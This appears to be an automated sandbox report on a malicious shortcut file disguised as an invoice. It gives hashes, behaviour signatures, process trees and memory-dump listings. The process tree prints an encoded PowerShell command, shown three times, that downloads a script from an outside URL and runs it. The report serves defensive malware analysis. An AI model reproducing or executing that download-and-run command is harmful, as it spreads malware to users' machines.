0cecbd1467320eb2b91adf45ccc75224699dc6910d29f840c10c47b46aaee20f

General

Target

Rechnung3949888 M5516519 TEU3949888.lnk
Size

52KB
MD5

6b0fad35a8aaef4b892a229b13a5a9b2
SHA1

194efa1278e4d4cb061d0eee5d42daf9590c9cf4
SHA256

0cecbd1467320eb2b91adf45ccc75224699dc6910d29f840c10c47b46aaee20f
SHA512

ca6566ef67c6b781f4390433e515350d823b13bfd6f502d0bc22aaf701a8a3e471494031cd0f130c44bcbdcfef40870152f2d7912cac3c018b6622c748a28a05
SSDEEP

768:qf2+GzRdDjk9OH2LKTW0pZ7m17RQePtdDFeceU8tIwz/zJJNYjPOGR5Xr:yaRdD+82WTW0p8h6ePXdwTzJKmI5Xr

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://www.sdsoffice.fr/test.txt

Signatures

Blocklisted process makes network request 6 IoCs

flow	pid	Process
3	2820	powershell.exe
4	2820	powershell.exe
6	2056	powershell.exe
7	2932	powershell.exe
8	2932	powershell.exe
9	2056	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2820	powershell.exe
2056	powershell.exe
2932	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2820	powershell.exe
Token: SeDebugPrivilege	2056	powershell.exe
Token: SeDebugPrivilege	2932	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 1744 wrote to memory of 2820	1744	cmd.exe	29
PID 1744 wrote to memory of 2820	1744	cmd.exe	29
PID 1744 wrote to memory of 2820	1744	cmd.exe	29

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Rechnung3949888 M5516519 TEU3949888.lnk"
1⤵
- Suspicious use of WriteProcessMemory
PID:1744
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -EncodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBzAGQAcwBvAGYAZgBpAGMAZQAuAGYAcgAvAHQAZQBzAHQALgB0AHgAdAAnACkAIAB8ACAASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuAA==
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2820

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
1⤵
PID:2540

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
1⤵
PID:1620

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -EncodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBzAGQAcwBvAGYAZgBpAGMAZQAuAGYAcgAvAHQAZQBzAHQALgB0AHgAdAAnACkAIAB8ACAASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuAA==
1⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2056

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -EncodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBzAGQAcwBvAGYAZgBpAGMAZQAuAGYAcgAvAHQAZQBzAHQALgB0AHgAdAAnACkAIAB8ACAASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuAA==
1⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2932

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\57d10db371012ded.customDestinations-ms

Filesize
6KB

MD5
7f29f56407817ff90589333108f9eadc

SHA1
4a71777992fdf9dea8550b37c721cb811d1cea78

SHA256
b23d343b20320d40ded506ec532eeddd57cbb896a89d05023a301107fcb60714

SHA512
a057d45654c36e45175c488fd7d647dbafce61ac77ba31d7302c4cfb2c43d233f15bc26bd69cb4db772b22805098aeb62ffb8aa67dcb964540eba48dbb27bded

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\57d10db371012ded.customDestinations-ms

Filesize
6KB

MD5
ff0d28eb98045158114c3940e61b15d8

SHA1
2dd8a67d5983dd0ee77dd141bb43da2a9c32c532

SHA256
ff62b8194ac1d77d1149e941f4c3956ddcca71b0ab70e2e0682d5203ef8567b9

SHA512
3ebebd713699d6b84dfec4041b5f322c5fb452d6eebbaef287d620182fdd0c6421f998e2634da15b7c2621819005c5e1f780aac3be1756ee6e5c6f7a6b974454

Download Submit
memory/2056-60-0x0000000002810000-0x0000000002890000-memory.dmp

Filesize
512KB

Download
memory/2056-72-0x000007FEF40C0000-0x000007FEF4A5D000-memory.dmp

Filesize
9.6MB

Download
memory/2056-71-0x0000000002810000-0x0000000002890000-memory.dmp

Filesize
512KB

Download
memory/2056-73-0x000007FEF40C0000-0x000007FEF4A5D000-memory.dmp

Filesize
9.6MB

Download
memory/2056-57-0x000007FEF40C0000-0x000007FEF4A5D000-memory.dmp

Filesize
9.6MB

Download
memory/2056-59-0x0000000002810000-0x0000000002890000-memory.dmp

Filesize
512KB

Download
memory/2056-58-0x0000000002810000-0x0000000002890000-memory.dmp

Filesize
512KB

Download
memory/2056-56-0x0000000001ED0000-0x0000000001ED8000-memory.dmp

Filesize
32KB

Download
memory/2056-74-0x0000000002810000-0x0000000002890000-memory.dmp

Filesize
512KB

Download
memory/2056-53-0x000000001B370000-0x000000001B652000-memory.dmp

Filesize
2.9MB

Download
memory/2056-54-0x000007FEF40C0000-0x000007FEF4A5D000-memory.dmp

Filesize
9.6MB

Download
memory/2056-55-0x0000000002810000-0x0000000002890000-memory.dmp

Filesize
512KB

Download
memory/2820-45-0x0000000002910000-0x0000000002990000-memory.dmp

Filesize
512KB

Download
memory/2820-42-0x0000000002910000-0x0000000002990000-memory.dmp

Filesize
512KB

Download
memory/2820-46-0x000007FEF5490000-0x000007FEF5E2D000-memory.dmp

Filesize
9.6MB

Download
memory/2820-38-0x000000001B2F0000-0x000000001B5D2000-memory.dmp

Filesize
2.9MB

Download
memory/2820-44-0x000007FEF5490000-0x000007FEF5E2D000-memory.dmp

Filesize
9.6MB

Download
memory/2820-43-0x0000000002910000-0x0000000002990000-memory.dmp

Filesize
512KB

Download
memory/2820-39-0x0000000001DE0000-0x0000000001DE8000-memory.dmp

Filesize
32KB

Download
memory/2820-47-0x0000000002910000-0x0000000002990000-memory.dmp

Filesize
512KB

Download
memory/2820-40-0x000007FEF5490000-0x000007FEF5E2D000-memory.dmp

Filesize
9.6MB

Download
memory/2820-41-0x0000000002910000-0x0000000002990000-memory.dmp

Filesize
512KB

Download
memory/2932-67-0x00000000025C0000-0x0000000002640000-memory.dmp

Filesize
512KB

Download
memory/2932-70-0x00000000025C0000-0x0000000002640000-memory.dmp

Filesize
512KB

Download
memory/2932-69-0x00000000025C0000-0x0000000002640000-memory.dmp

Filesize
512KB

Download
memory/2932-68-0x000007FEF40C0000-0x000007FEF4A5D000-memory.dmp

Filesize
9.6MB

Download
memory/2932-66-0x000007FEF40C0000-0x000007FEF4A5D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing